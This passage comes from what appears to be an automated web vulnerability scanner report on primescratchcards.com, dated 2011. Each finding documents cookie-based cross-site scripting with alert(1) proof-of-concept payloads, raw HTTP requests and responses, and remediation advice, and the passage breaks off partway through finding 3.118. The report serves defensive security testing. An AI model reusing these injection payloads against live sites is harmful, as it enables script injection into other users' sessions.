<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137d5a37--><script>alert(1)</script>2daf1f805c5">
...[SNIP]...

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39fde'%3balert(1)//02965ba86d3 was submitted in the ARC cookie. This input was echoed as 39fde';alert(1)//02965ba86d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013739fde'%3balert(1)//02965ba86d3; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013739fde%27%3Balert%281%29%2F%2F02965ba86d3; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013739fde';alert(1)//02965ba86d3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7b916--><script>alert(1)</script>15bbf18f026 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b916--><script>alert(1)</script>15bbf18f026; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377b916%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E15bbf18f026; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377b916--><script>alert(1)</script>15bbf18f026">
...[SNIP]...

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7a4'%3balert(1)//9a734a2209d was submitted in the ARC cookie. This input was echoed as 8c7a4';alert(1)//9a734a2209d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378c7a4'%3balert(1)//9a734a2209d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378c7a4%27%3Balert%281%29%2F%2F9a734a2209d; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378c7a4';alert(1)//9a734a2209d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ace"%3balert(1)//b357ff571da was submitted in the ARC cookie. This input was echoed as 59ace";alert(1)//b357ff571da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759ace"%3balert(1)//b357ff571da; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759ace%22%3Balert%281%29%2F%2Fb357ff571da; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759ace";alert(1)//b357ff571da' border='0' width='1' height='1'>
...[SNIP]...

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcc5b'%3balert(1)//703cebd666 was submitted in the ARC cookie. This input was echoed as dcc5b';alert(1)//703cebd666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137dcc5b'%3balert(1)//703cebd666; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=130137dcc5b%27%3Balert%281%29%2F%2F703cebd666; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137dcc5b';alert(1)//703cebd666&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4d39c--><script>alert(1)</script>62968452208 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374d39c--><script>alert(1)</script>62968452208; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374d39c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E62968452208; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374d39c--><script>alert(1)</script>62968452208">
...[SNIP]...

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2596a"%3balert(1)//e55764e40a4 was submitted in the ARC cookie. This input was echoed as 2596a";alert(1)//e55764e40a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301372596a"%3balert(1)//e55764e40a4; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372596a%22%3Balert%281%29%2F%2Fe55764e40a4; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301372596a";alert(1)//e55764e40a4' border='0' width='1' height='1'>
...[SNIP]...

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f636d--><script>alert(1)</script>bab01666262 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f636d--><script>alert(1)</script>bab01666262; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137f636d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebab01666262; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f636d--><script>alert(1)</script>bab01666262">
...[SNIP]...

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fe5'%3balert(1)//65cb78f18b8 was submitted in the ARC cookie. This input was echoed as 46fe5';alert(1)//65cb78f18b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013746fe5'%3balert(1)//65cb78f18b8; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013746fe5%27%3Balert%281%29%2F%2F65cb78f18b8; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013746fe5';alert(1)//65cb78f18b8&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa3b"%3balert(1)//d22930547e was submitted in the ARC cookie. This input was echoed as 3fa3b";alert(1)//d22930547e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373fa3b"%3balert(1)//d22930547e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=1301373fa3b%22%3Balert%281%29%2F%2Fd22930547e; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373fa3b";alert(1)//d22930547e' border='0' width='1' height='1'>
...[SNIP]...

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c354'%3balert(1)//78c486a4ea7 was submitted in the ARC cookie. This input was echoed as 2c354';alert(1)//78c486a4ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301372c354'%3balert(1)//78c486a4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372c354%27%3Balert%281%29%2F%2F78c486a4ea7; expires=Tue, 15-May-2012 11:42:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=BKMOLGNDNJKAKAFGLDIAGACP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301372c354';alert(1)//78c486a4ea7&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 11f92--><script>alert(1)</script>092fca28c0d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=13013711f92--><script>alert(1)</script>092fca28c0d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013711f92%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E092fca28c0d; expires=Tue, 15-May-2012 11:42:04 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=HKMOLGNDNIHAGDGLIENJFGLH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013711f92--><script>alert(1)</script>092fca28c0d">
...[SNIP]...

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3566c"%3balert(1)//052f6e6caae was submitted in the ARC cookie. This input was echoed as 3566c";alert(1)//052f6e6caae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301373566c"%3balert(1)//052f6e6caae

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301373566c%22%3Balert%281%29%2F%2F052f6e6caae; expires=Tue, 15-May-2012 11:42:00 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=NJMOLGNDOCCNBEMDLFHPBAKN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373566c";alert(1)//052f6e6caae' border='0' width='1' height='1'>
...[SNIP]...

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

